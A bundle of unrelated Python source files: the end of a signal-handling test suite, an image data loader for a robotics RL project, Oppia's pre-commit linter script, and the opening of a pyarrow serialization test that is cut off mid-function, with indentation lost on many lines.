os.kill(pid, signal.SIGUSR1)
path = os.path.join(factory.HOME.path, '.ave', 'hickup')
wait_hickup_dir(path, 3)
time.sleep(1)
files = glob.glob(os.path.join(path, '*'))
for f in files:
if f.endswith('hickup_catch_sigusr1'):
print('FAIL %s: external child got SIGUSR1' % pretty)
return False
if len(files) != 2:
print('FAIL %s: wrong number of files: %s' % (pretty, files))
return False
return True
# signal a process multiple times, count the trace files
@setup.factory()
def t05(pretty, factory):
ctrl = factory.make_control(home=factory.HOME.path)
for i in range(3):
try:
ctrl.kill(signal.SIGUSR1)
except ConnectionClosed:
print('FAIL %s: process died %d' % (pretty, i))
return False
        except Exception as e:
print('FAIL %s: unknown error %d: %s' % (pretty, i, e))
return False
time.sleep(1.1)
path = os.path.join(factory.HOME.path, '.ave', 'hickup')
wait_hickup_dir(path, 3)
files = glob.glob(os.path.join(path, '*'))
if len(files) != 3:
print('FAIL %s: wrong number of files: %d' % (pretty, len(files)))
return False
return True
# check that signalling does not interfere with message passing
@setup.factory()
def t06(pretty, factory):
def killer(pid):
for i in range(150):
os.kill(pid, signal.SIGUSR1)
time.sleep(0.05)
ctrl = factory.make_control(home=factory.HOME.path, authkey='')
proc = Process(target=killer, args=(ctrl.get_pid(),))
proc.start()
# connect and authenticate
conn = BlockingConnection(('',ctrl.port))
conn.connect()
conn.put(make_digest(conn.get(), ''))
finish_challenge(conn.get())
# feed messages slowly to the controller, check that it doesn't crash
ok = True
for i in range(15):
blob = RemoteControl.make_rpc_blob('upper', None, 'a'*5000)
conn.write(Connection.make_header(blob))
#print '<',i
for char in blob:
conn.write(char)
time.sleep(0.00002)
#print '>',i
try:
msg = conn.get(timeout=1)
        except Exception as e:
print('FAIL %s: control crashed in step %d: %s' % (pretty, i, e))
ok = False
break
try:
msg = json.loads(msg)
        except Exception as e:
            print('FAIL %s: could not decode response %d: %s' % (pretty, i, e))
ok = False
break
if msg != { 'result': 'A'*5000 }:
print('FAIL %s: wrong response in step %d: %s' % (pretty, i, msg))
ok = False
break
proc.join()
return ok
|
data_loader.py
|
# Original code from https://github.com/araffin/robotics-rl-srl
# Authors: Antonin Raffin, René Traoré, Ashley Hill
import queue
import time
from multiprocessing import Queue, Process
import cv2
import numpy as np
from joblib import Parallel, delayed
from modules.config import IMAGE_WIDTH, IMAGE_HEIGHT, ROI
def preprocess_input(x, mode="rl"):
"""
Normalize input.
:param x: (np.ndarray) (RGB image with values between [0, 255])
:param mode: (str) One of "image_net", "tf" or "rl".
- rl: divide by 255 only (rescale to [0, 1])
- image_net: will zero-center each color channel with
respect to the ImageNet dataset,
with scaling.
cf http://pytorch.org/docs/master/torchvision/models.html
- tf: will scale pixels between -1 and 1,
sample-wise.
:return: (np.ndarray)
"""
assert x.shape[-1] == 3, "Color channel must be at the end of the tensor {}".format(x.shape)
    # All modes start by rescaling to [0, 1] (RL mode does only this)
x /= 255.
if mode == "tf":
x -= 0.5
x *= 2.
elif mode == "image_net":
# Zero-center by mean pixel
x[..., 0] -= 0.485
x[..., 1] -= 0.456
x[..., 2] -= 0.406
# Scaling
x[..., 0] /= 0.229
x[..., 1] /= 0.224
x[..., 2] /= 0.225
elif mode == "rl":
pass
else:
raise ValueError("Unknown mode for preprocessing")
return x
def denormalize(x, mode="rl"):
"""
    De-normalize data (transform the input back to a uint8 image in [0, 255])
:param x: (np.ndarray)
:param mode: (str) One of "image_net", "tf", "rl".
:return: (np.ndarray)
"""
if mode == "tf":
x /= 2.
x += 0.5
elif mode == "image_net":
# Scaling
x[..., 0] *= 0.229
x[..., 1] *= 0.224
x[..., 2] *= 0.225
# Undo Zero-center
x[..., 0] += 0.485
x[..., 1] += 0.456
x[..., 2] += 0.406
elif mode == "rl":
pass
else:
raise ValueError("Unknown mode for denormalize")
# Clip to fix numeric imprecision (1e-09 = 0)
return (255 * np.clip(x, 0, 1)).astype(np.uint8)
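# Quick sanity check for the two helpers above (a sketch, not part of the
# original module): preprocessing followed by denormalization should recover
# the original uint8-valued image, up to 1 unit of truncation error, for
# every supported mode.
def _normalization_roundtrip_demo():
    demo = np.random.randint(0, 256, size=(4, 4, 3)).astype(np.float32)
    for demo_mode in ("rl", "tf", "image_net"):
        restored = denormalize(preprocess_input(demo.copy(), mode=demo_mode),
                               mode=demo_mode)
        assert np.abs(restored.astype(np.float32) - demo).max() <= 1.0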
def preprocess_image(image, convert_to_rgb=False):
"""
Crop, resize and normalize image.
    Optionally it also converts the image from BGR to RGB.
:param image: (np.ndarray) image (BGR or RGB)
:param convert_to_rgb: (bool) whether the conversion to rgb is needed or not
:return: (np.ndarray)
"""
# Crop
# Region of interest
r = ROI
image = image[int(r[1]):int(r[1] + r[3]), int(r[0]):int(r[0] + r[2])]
# Resize
im = cv2.resize(image, (IMAGE_WIDTH, IMAGE_HEIGHT), interpolation=cv2.INTER_AREA)
# Convert BGR to RGB
if convert_to_rgb:
im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
# Normalize
im = preprocess_input(im.astype(np.float32), mode="rl")
return im
class DataLoader(object):
def __init__(self, minibatchlist, images_path, n_workers=1, folder='logs/recorded_data/',
infinite_loop=True, max_queue_len=4, is_training=False):
"""
A Custom dataloader to preprocessing images and feed them to the network.
:param minibatchlist: ([np.array]) list of observations indices (grouped per minibatch)
:param images_path: (np.array) Array of path to images
:param n_workers: (int) number of preprocessing worker (load and preprocess each image)
:param folder: (str)
:param infinite_loop: (bool) whether to have an iterator that can be resetted, set to False, it
:param max_queue_len: (int) Max number of minibatches that can be preprocessed at the same time
:param is_training: (bool)
"""
super(DataLoader, self).__init__()
self.n_workers = n_workers
self.infinite_loop = infinite_loop
self.n_minibatches = len(minibatchlist)
self.minibatchlist = minibatchlist
self.images_path = images_path
self.shuffle = is_training
self.folder = folder
self.queue = Queue(max_queue_len)
self.process = None
self.start_process()
@staticmethod
def create_minibatch_list(n_samples, batch_size):
"""
Create list of minibatches.
:param n_samples: (int)
:param batch_size: (int)
:return: ([np.array])
"""
        minibatchlist = []
        for i in range(n_samples // batch_size + 1):
            start_idx = i * batch_size
            end_idx = min(n_samples, (i + 1) * batch_size)
            if start_idx == end_idx:
                # skip the empty trailing batch produced when n_samples
                # is an exact multiple of batch_size
                continue
            minibatchlist.append(np.arange(start_idx, end_idx))
return minibatchlist
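    # Example (a sketch): with n_samples=10 and batch_size=4 this yields
    #   [array([0, 1, 2, 3]), array([4, 5, 6, 7]), array([8, 9])]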
def start_process(self):
"""Start preprocessing process"""
self.process = Process(target=self._run)
        # Make it a daemon so it is terminated together
        # with the main process
self.process.daemon = True
self.process.start()
def _run(self):
start = True
with Parallel(n_jobs=self.n_workers, batch_size="auto", backend="threading") as parallel:
while start or self.infinite_loop:
start = False
if self.shuffle:
indices = np.random.permutation(self.n_minibatches).astype(np.int64)
else:
indices = np.arange(len(self.minibatchlist), dtype=np.int64)
for minibatch_idx in indices:
images = self.images_path[self.minibatchlist[minibatch_idx]]
if self.n_workers <= 1:
batch = [self._make_batch_element(self.folder, image_path)
for image_path in images]
else:
batch = parallel(delayed(self._make_batch_element)(self.folder, image_path)
for image_path in images)
batch = np.concatenate(batch, axis=0)
if self.shuffle:
self.queue.put((minibatch_idx, batch))
else:
self.queue.put(batch)
# Free memory
del batch
self.queue.put(None)
@classmethod
def _make_batch_element(cls, folder, image_path):
"""
:param image_path: (str) path to an image (without the 'data/' prefix)
:return: (np.ndarray)
"""
image_path = folder + image_path
im = cv2.imread(image_path)
if im is None:
raise ValueError("tried to load {}.jpg, but it was not found".format(image_path))
im = preprocess_image(im)
im = im.reshape((1,) + im.shape)
return im
def __len__(self):
return self.n_minibatches
def __iter__(self):
return self
def __next__(self):
while True:
try:
val = self.queue.get_nowait()
break
except queue.Empty:
time.sleep(0.001)
continue
if val is None:
raise StopIteration
return val
def __del__(self):
if self.process is not None:
self.process.terminate()
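# Minimal usage sketch (hypothetical paths; assumes the images exist under
# `folder` and that modules.config provides IMAGE_WIDTH/IMAGE_HEIGHT/ROI):
#
#     images = np.array(['obs_0.jpg', 'obs_1.jpg', 'obs_2.jpg'])
#     minibatches = DataLoader.create_minibatch_list(len(images), batch_size=2)
#     loader = DataLoader(minibatches, images, n_workers=2,
#                         folder='logs/recorded_data/', infinite_loop=False)
#     for batch in loader:
#         pass  # batch: (batch_size, IMAGE_HEIGHT, IMAGE_WIDTH, 3) float array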
|
pre_commit_linter.py
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pre-commit script for Oppia.
This script lints Python and JavaScript code, and prints a
list of lint errors to the terminal. If the directory path is passed,
it will lint all Python and JavaScript files in that directory; otherwise,
it will only lint files that have been touched in this commit.
This script ignores all filepaths contained within .eslintignore.
=====================
CUSTOMIZATION OPTIONS
=====================
1. To lint only files that have been touched in this commit
python -m scripts.linters.pre_commit_linter
2. To lint all files in the folder or to lint just a specific file
python -m scripts.linters.pre_commit_linter --path filepath
3. To lint a specific list of files. Separate filepaths by spaces
python -m scripts.linters.pre_commit_linter
--files filepath_1 filepath_2 ... filepath_n
4. To lint files in verbose mode
python -m scripts.linters.pre_commit_linter --verbose
5. To lint a specific list of file extensions. Separate file
extensions by spaces
python -m scripts.linters.pre_commit_linter
--only-check-file-extensions py js
Note that the root folder MUST be named 'oppia'.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
import fnmatch
import multiprocessing
import os
import subprocess
import sys
import threading
import python_utils
# Install third party dependencies before proceeding.
from . import codeowner_linter
from . import css_linter
from . import general_purpose_linter
from . import html_linter
from . import js_ts_linter
from . import other_files_linter
from . import python_linter
from .. import common
from .. import concurrent_task_utils
from .. import install_third_party_libs
_PARSER = argparse.ArgumentParser()
_EXCLUSIVE_GROUP = _PARSER.add_mutually_exclusive_group()
_PARSER.add_argument(
'--path',
help='path to the directory with files to be linted',
action='store')
_EXCLUSIVE_GROUP.add_argument(
'--files',
nargs='+',
help='specific files to be linted. Space separated list',
action='store')
_EXCLUSIVE_GROUP.add_argument(
'--verbose',
help='verbose mode. All details will be printed.',
action='store_true')
_PARSER.add_argument(
'--only-check-file-extensions',
nargs='+',
choices=['html', 'css', 'js', 'ts', 'py', 'other'],
help='specific file extensions to be linted. Space separated list. '
'If either of js or ts used then both js and ts files will be linted.',
action='store')
_PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
_PATHS_TO_INSERT = [
os.getcwd(),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME, 'lib', 'yaml-3.10'),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME, 'lib', 'jinja2-2.6'),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'webtest-%s' % common.WEBTEST_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'PyGithub-%s' % common.PYGITHUB_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'Pillow-%s' % common.PILLOW_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'psutil-%s' % common.PSUTIL_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'pip-tools-%s' % common.PIP_TOOLS_VERSION),
common.THIRD_PARTY_PYTHON_LIBS_DIR
]
for path in _PATHS_TO_INSERT:
sys.path.insert(0, path)
_TARGET_STDOUT = python_utils.string_io()
_STDOUT_LIST = multiprocessing.Manager().list()
_FILES = multiprocessing.Manager().dict()
class FileCache(python_utils.OBJECT):
"""Provides thread-safe access to cached file content."""
def __init__(self):
self._CACHE_DATA_DICT = {}
def read(self, filepath, mode='r'):
"""Returns the data read from the file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
str. The data read from the file.
"""
return self._get_data(filepath, mode)[0]
def readlines(self, filepath, mode='r'):
"""Returns the tuple containing data line by line as read from the
file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str). The tuple containing data line by line as read from the
file.
"""
return self._get_data(filepath, mode)[1]
def _get_data(self, filepath, mode):
"""Returns the collected data from the file corresponding to the given
filepath.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str, tuple(str)). The tuple containing data read from the file
as first element and tuple containing the text line by line as
second element.
"""
key = (filepath, mode)
if key not in self._CACHE_DATA_DICT:
with python_utils.open_file(filepath, mode, newline='') as f:
lines = f.readlines()
self._CACHE_DATA_DICT[key] = (''.join(lines), tuple(lines))
return self._CACHE_DATA_DICT[key]
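# FILE_CACHE (instantiated at the bottom of this module) is the shared
# FileCache used by the linters. A typical access pattern, sketched with a
# hypothetical path:
#
#     content = FILE_CACHE.read('scripts/linters/pre_commit_linter.py')
#     lines = FILE_CACHE.readlines('scripts/linters/pre_commit_linter.py')
#
# Repeated reads of the same (filepath, mode) pair are served from the cache.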
def _get_linters_for_file_extension(file_extension_to_lint):
"""Return linters for the file extension type.
Args:
file_extension_to_lint: str. The file extension to be linted.
Returns:
(CustomLintChecks, ThirdPartyLintChecks). A 2-tuple containing objects
of lint check classes to run in parallel processing.
"""
parent_dir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
custom_linters = []
third_party_linters = []
file_extension_type_js_ts = file_extension_to_lint == 'js' or (
file_extension_to_lint == 'ts')
if file_extension_type_js_ts:
general_files_to_lint = _FILES['.js'] + _FILES['.ts']
elif file_extension_to_lint == 'other':
general_files_to_lint = _FILES['other']
else:
general_files_to_lint = _FILES['.%s' % file_extension_to_lint]
custom_linter, third_party_linter = general_purpose_linter.get_linters(
general_files_to_lint, FILE_CACHE)
custom_linters.append(custom_linter)
if file_extension_type_js_ts:
custom_linter, third_party_linter = js_ts_linter.get_linters(
_FILES['.js'], _FILES['.ts'], FILE_CACHE)
custom_linters.append(custom_linter)
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'html':
custom_linter, third_party_linter = html_linter.get_linters(
_FILES['.html'], FILE_CACHE)
custom_linters.append(custom_linter)
third_party_linters.append(third_party_linter)
config_path_for_css_in_html = os.path.join(
parent_dir, 'oppia', '.stylelintrc')
custom_linter, third_party_linter = css_linter.get_linters(
config_path_for_css_in_html, _FILES['.html'])
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'css':
config_path_for_oppia_css = os.path.join(
parent_dir, 'oppia', 'core', 'templates', 'css', '.stylelintrc')
custom_linter, third_party_linter = css_linter.get_linters(
config_path_for_oppia_css, _FILES['.css'])
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'py':
custom_linter, third_party_linter = python_linter.get_linters(
_FILES['.py'], FILE_CACHE)
custom_linters.append(custom_linter)
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'other':
custom_linter, _ = codeowner_linter.get_linters(FILE_CACHE)
custom_linters.append(custom_linter)
custom_linter, _ = other_files_linter.get_linters(FILE_CACHE)
custom_linters.append(custom_linter)
return custom_linters, third_party_linters
def _get_changed_filepaths():
"""Returns a list of modified files (both staged and unstaged)
Returns:
list. A list of filepaths of modified files.
"""
unstaged_files = subprocess.check_output([
'git', 'diff', '--name-only',
'--diff-filter=ACM']).splitlines()
staged_files = subprocess.check_output([
'git', 'diff', '--cached', '--name-only',
'--diff-filter=ACM']).splitlines()
all_changed_filepaths = unstaged_files + staged_files
return [filepath for filepath in all_changed_filepaths]
def _get_all_files_in_directory(dir_path, excluded_glob_patterns):
"""Recursively collects all files in directory and
subdirectories of specified path.
Args:
dir_path: str. Path to the folder to be linted.
excluded_glob_patterns: set(str). Set of all glob patterns
to be excluded.
Returns:
list. A list of files in directory and subdirectories without excluded
files.
"""
files_in_directory = []
for _dir, _, files in os.walk(dir_path):
for file_name in files:
filepath = os.path.relpath(
os.path.join(_dir, file_name), os.getcwd())
if not any([
fnmatch.fnmatch(filepath, gp) for gp in
excluded_glob_patterns]):
files_in_directory.append(filepath)
return files_in_directory
def _get_file_extensions(file_extensions_to_lint):
"""This function is used to return the file extensions which need to be
linted and checked.
Args:
file_extensions_to_lint: list(str). The list of file extensions to be
linted and checked.
    Returns:
        set(str)|list(str). The file extensions to be linted and checked.
"""
all_file_extensions_type = ['js', 'py', 'html', 'css', 'other']
if file_extensions_to_lint:
# Check if 'js' and 'ts' both are present in file_extensions_to_lint.
js_and_ts_is_present = 'js' in file_extensions_to_lint and (
'ts' in file_extensions_to_lint)
if js_and_ts_is_present:
python_utils.PRINT(
'Please use only one of "js" or "ts", as we do not have '
'separate linters for JS and TS files. If both these options '
'are used together, then the JS/TS linter will be run twice.')
python_utils.PRINT('Exiting...')
sys.exit(1)
return set(file_extensions_to_lint)
return all_file_extensions_type
def _get_all_filepaths(input_path, input_filenames):
"""This function is used to return the filepaths which needs to be linted
and checked.
Args:
input_path: str. The path of the directory to be linted and checked.
input_filenames: list(str). The list of filenames to be linted and
checked, ignored if input_path is specified.
Returns:
list(str). The list of filepaths to be linted and checked.
"""
eslintignore_path = os.path.join(os.getcwd(), '.eslintignore')
if input_path:
input_path = os.path.join(os.getcwd(), input_path)
if not os.path.exists(input_path):
python_utils.PRINT(
'Could not locate file or directory %s. Exiting.' % input_path)
python_utils.PRINT('----------------------------------------')
sys.exit(1)
if os.path.isfile(input_path):
all_filepaths = [input_path]
else:
excluded_glob_patterns = FILE_CACHE.readlines(eslintignore_path)
all_filepaths = _get_all_files_in_directory(
input_path, excluded_glob_patterns)
elif input_filenames:
valid_filepaths = []
invalid_filepaths = []
for filename in input_filenames:
if os.path.isfile(filename):
valid_filepaths.append(filename)
else:
invalid_filepaths.append(filename)
if invalid_filepaths:
python_utils.PRINT(
'The following file(s) do not exist: %s\n'
'Exiting.' % invalid_filepaths)
sys.exit(1)
all_filepaths = valid_filepaths
else:
all_filepaths = _get_changed_filepaths()
all_filepaths = [
filename for filename in all_filepaths if not
any(fnmatch.fnmatch(filename, pattern) for pattern in(
general_purpose_linter.EXCLUDED_PATHS))]
return all_filepaths
def read_files(file_paths):
"""Read all files to be checked and cache them. This will spin off multiple
threads to increase the efficiency.
"""
threads = []
for file_path in file_paths:
thread = threading.Thread(target=FILE_CACHE.read, args=(file_path,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def categorize_files(file_paths):
"""Categorize all the files and store them in shared variable _FILES."""
all_filepaths_dict = {
'.py': [], '.html': [], '.ts': [], '.js': [], 'other': [], '.css': []
}
for file_path in file_paths:
_, extension = os.path.splitext(file_path)
if extension in all_filepaths_dict:
all_filepaths_dict[extension].append(file_path)
else:
all_filepaths_dict['other'].append(file_path)
_FILES.update(all_filepaths_dict)
def _print_summary_of_error_messages(lint_messages):
"""Print summary of linter error messages.
Args:
lint_messages: list(str). List of linter error messages.
"""
    if lint_messages:
python_utils.PRINT('Please fix the errors below:')
python_utils.PRINT('----------------------------------------')
for message in lint_messages:
python_utils.PRINT(message)
def _get_task_output(lint_messages, failed, task):
"""Returns output of running tasks.
Args:
lint_messages: list(str). List of summary messages of linter output.
failed: bool. The boolean to check if lint checks fail or not.
task: object(TestingTaskSpec). The task object to get output of linter.
Returns:
bool. The boolean to check if the lint checks fail or not.
"""
if task.task_results:
for task_result in task.task_results:
lint_messages += task_result.trimmed_messages
if task_result.failed:
failed = True
return failed
def _print_errors_stacktrace(errors_stacktrace):
"""Print errors stacktrace caught during linter execution.
Args:
errors_stacktrace: list(str). List of error stacktrace of lint
execution failure.
"""
python_utils.PRINT('')
python_utils.PRINT(
'Unable to run the complete lint test, please check '
'the following stack trace and fix the errors:')
python_utils.PRINT('+--------------------------+')
for stacktrace in errors_stacktrace:
python_utils.PRINT(stacktrace)
python_utils.PRINT('--------------------------------------------------')
python_utils.PRINT('')
python_utils.PRINT('--------------------------------------------------')
    python_utils.PRINT(
        'Some of the linting functions may not run until the'
        ' above errors get fixed')
def main(args=None):
"""Main method for pre commit linter script that lints Python, JavaScript,
HTML, and CSS files.
"""
parsed_args = _PARSER.parse_args(args=args)
# File extension to be linted.
file_extension_types = _get_file_extensions(
parsed_args.only_check_file_extensions)
# Default mode is non-verbose mode, if arguments contains --verbose flag it
# will be made True, which will represent verbose mode.
verbose_mode_enabled = bool(parsed_args.verbose)
all_filepaths = _get_all_filepaths(parsed_args.path, parsed_args.files)
install_third_party_libs.main()
python_utils.PRINT('Starting Linter....')
if len(all_filepaths) == 0:
python_utils.PRINT('---------------------------')
python_utils.PRINT('No files to check.')
python_utils.PRINT('---------------------------')
return
read_files(all_filepaths)
categorize_files(all_filepaths)
# Prepare custom tasks.
custom_max_concurrent_runs = 25
custom_concurrent_count = min(
multiprocessing.cpu_count(), custom_max_concurrent_runs)
custom_semaphore = threading.Semaphore(custom_concurrent_count)
# Prepare third_party tasks.
third_party_max_concurrent_runs = 2
third_party_concurrent_count = min(
multiprocessing.cpu_count(), third_party_max_concurrent_runs)
third_party_semaphore = threading.Semaphore(third_party_concurrent_count)
custom_linters = []
third_party_linters = []
for file_extension_type in file_extension_types:
custom_linter, third_party_linter = _get_linters_for_file_extension(
file_extension_type)
custom_linters += custom_linter
third_party_linters += third_party_linter
# Create tasks.
tasks_custom = []
tasks_third_party = []
for linter in custom_linters:
task_custom = concurrent_task_utils.create_task(
linter.perform_all_lint_checks, verbose_mode_enabled,
custom_semaphore, name='custom')
tasks_custom.append(task_custom)
for linter in third_party_linters:
task_third_party = concurrent_task_utils.create_task(
linter.perform_all_lint_checks, verbose_mode_enabled,
third_party_semaphore, name='third_party')
tasks_third_party.append(task_third_party)
# Execute tasks.
    # Here we set the concurrency limit for custom tasks to 25 because we
    # want to parallelize the tasks to use the full capacity of the CPU.
    # The concurrency limit for third-party tasks is set to 2 because these
    # third-party libraries have their own ways to lint at their fastest
    # (i.e. they might parallelize on their own).
# Concurrency limit: 25.
concurrent_task_utils.execute_tasks(tasks_custom, custom_semaphore)
# Concurrency limit: 2.
concurrent_task_utils.execute_tasks(
tasks_third_party, third_party_semaphore)
lint_messages = []
failed = False
for task in tasks_custom:
failed = _get_task_output(lint_messages, failed, task)
for task in tasks_third_party:
failed = _get_task_output(lint_messages, failed, task)
errors_stacktrace = concurrent_task_utils.ALL_ERRORS
if errors_stacktrace:
_print_errors_stacktrace(errors_stacktrace)
if failed:
_print_summary_of_error_messages(lint_messages)
python_utils.PRINT('---------------------------')
python_utils.PRINT('Checks Not Passed.')
python_utils.PRINT('---------------------------')
sys.exit(1)
else:
python_utils.PRINT('---------------------------')
python_utils.PRINT('All Checks Passed.')
python_utils.PRINT('---------------------------')
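# The semaphore-bounded execution in main() can be illustrated in isolation.
# A minimal sketch (not part of the linter, and simpler than
# concurrent_task_utils): each worker acquires the semaphore before running,
# so at most `limit` tasks execute concurrently.
def _bounded_tasks_sketch(limit=2, n_tasks=5):
    semaphore = threading.Semaphore(limit)
    def _work(task_id):
        semaphore.acquire()
        try:
            python_utils.PRINT('running task %d' % task_id)
        finally:
            semaphore.release()
    demo_threads = [
        threading.Thread(target=_work, args=(i,)) for i in range(n_tasks)]
    for demo_thread in demo_threads:
        demo_thread.start()
    for demo_thread in demo_threads:
        demo_thread.join()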
NAME_SPACE = multiprocessing.Manager().Namespace()
PROCESSES = multiprocessing.Manager().dict()
NAME_SPACE.files = FileCache()
FILE_CACHE = NAME_SPACE.files
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when pre_commit_linter.py is used as a
# script.
if __name__ == '__main__': # pragma: no cover
main()
|
test_serialization.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import division
import pytest
from collections import namedtuple, OrderedDict, defaultdict
import datetime
import os
import string
import sys
import pyarrow as pa
import numpy as np
import pyarrow.tests.util as test_util
try:
import torch
except ImportError:
torch = None
# Blacklist the module in case `import torch` is costly before
# failing (ARROW-2071)
sys.modules['torch'] = None
def assert_equal(obj1, obj2):
if torch is not None and torch.is_tensor(obj1) and torch.is_tensor(obj2):
assert torch.equal(obj1, obj2)
return
module_numpy = (type(obj1).__module__ == np.__name__ or
type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ()) or
(hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
            # This is a special case: np.testing.assert_equal currently
            # fails here because we do not properly handle comparisons
            # between different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) ==
set(list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different."
.format(
obj1,
obj2))
try:
# Workaround to make comparison of OrderedDicts work on Python 2.7
if obj1 == obj2:
return
except Exception:
pass
if obj1.__dict__ == {}:
print("WARNING: Empty dict in ", obj1)
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (pa.lib.is_named_tuple(type(obj1)) or
pa.lib.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif isinstance(obj1, pa.Array) and isinstance(obj2, pa.Array):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.Tensor) and isinstance(obj2, pa.Tensor):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.RecordBatch) and isinstance(obj2, pa.RecordBatch):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.Table) and isinstance(obj2, pa.Table):
assert obj1.equals(obj2)
else:
assert type(obj1) == type(obj2) and obj1 == obj2, \
"Objects {} and {} are different.".format(obj1, obj2)
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 999,
[1 << 100, [1 << 100]], "a", string.printable, "\u262F",
"hello world", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {}, {(1, 2): 1}, {(): 2},
[1, "hello", 3.0], u"\u262F", 42.0, (1.0, "hi"),
[1, 2, 3, None], [(None,), 3, 1.0], ["h", "e", "l", "l", "o", None],
(None, None), ("hello", None), (True, False),
{True: "hello", False: "world"}, {"hello": "world", 1: 42, 2.5: 45},
{"hello": set([2, 3]), "world": set([42.0]), "this": None},
np.int8(3), np.int32(4), np.int64(5),
np.uint8(3), np.uint32(4), np.uint64(5),
np.float16(1.9), np.float32(1.9),
np.float64(1.9), np.zeros([8, 20]),
np.random.normal(size=[17, 10]), np.array(["hi", 3]),
np.array(["hi", 3], dtype=object),
np.random.normal(size=[15, 13]).T
]
if sys.version_info >= (3, 0):
PRIMITIVE_OBJECTS += [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
PRIMITIVE_OBJECTS += [long(42), long(1 << 62), long(0), # noqa
np.array([["hi", u"hi"],
[1.3, long(1)]])] # noqa
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[4, 4]) for i in range(5)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
((((((((((),),),),),),),),),),
{"a": {"b": {"c": {"d": {}}}}},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(1), Foo(42)]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class SubQuxPickle(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
"field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [Exception("Test object."), CustomError(), Point(11, y=22),
Foo(), Bar(), Baz(), Qux(), SubQux(), SubQuxPickle(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
OrderedDict([("hello", 1), ("world", 2)])]
def make_serialization_context():
context = pa.default_serialization_context()
context.register_type(Foo, "Foo")
context.register_type(Bar, "Bar")
